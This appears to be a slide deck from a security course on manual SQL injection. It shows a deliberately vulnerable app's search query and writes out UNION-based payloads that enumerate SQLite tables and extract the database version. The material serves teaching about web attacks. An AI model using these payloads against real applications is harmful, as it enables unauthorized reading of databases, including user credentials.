Injection Attacks: The Complete 2020 Guide

Manual SQL Injections



CREATE TABLE `Users` 
(`id` INTEGER PRIMARY KEY AUTOINCREMENT, 
`username` VARCHAR(255) DEFAULT '', 
`email` VARCHAR(255) UNIQUE, 
`password` VARCHAR(255), 
`role` VARCHAR(255) DEFAULT 'customer', 
`deluxeToken` VARCHAR(255) DEFAULT '', 
`lastLoginIp` VARCHAR(255) DEFAULT '0.0.0.0', 
`profileImage` VARCHAR(255) DEFAULT '/assets/public/images/uploads/default.svg', 
`totpSecret` VARCHAR(255) DEFAULT '', 
`isActive` TINYINT(1) DEFAULT 1, 
`createdAt` DATETIME NOT NULL, 
`updatedAt` DATETIME NOT NULL, 
`deletedAt` DATETIME)



SELECT * FROM Products WHERE 
((name LIKE '%' OR description LIKE '%') AND deletedAt IS NULL) 
ORDER BY name;

SQL query being used by the application for the search function



SELECT * FROM Products WHERE ((name LIKE '%')) UNION SELECT [etc...]

What we would like for the query to look like...



SELECT name FROM sqlite_master
WHERE type='table' 
ORDER BY name;

Query to list all tables in a SQLite database



')) UNION SELECT name,name,name,name,name,name,name,name,name FROM sqlite_master WHERE type='table' --

What our payload looks like



SELECT * FROM Products WHERE ((name LIKE '%')) UNION SELECT name,name,name,name,name,name,name,name,name
FROM sqlite_master 
WHERE type='table' --

Which will result in this query



')) UNION SELECT sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(),sqlite_version(); --

Payload to get the SQLite database version

Manual SQL injections

By Christophe Limpalair

Manual SQL injections

Christophe Limpalair

Co-Founder of Cybr, and Course Author

Injection Attacks: The Complete 2020 Guide

Manual SQL Injections

Manual SQL injections

More from Christophe Limpalair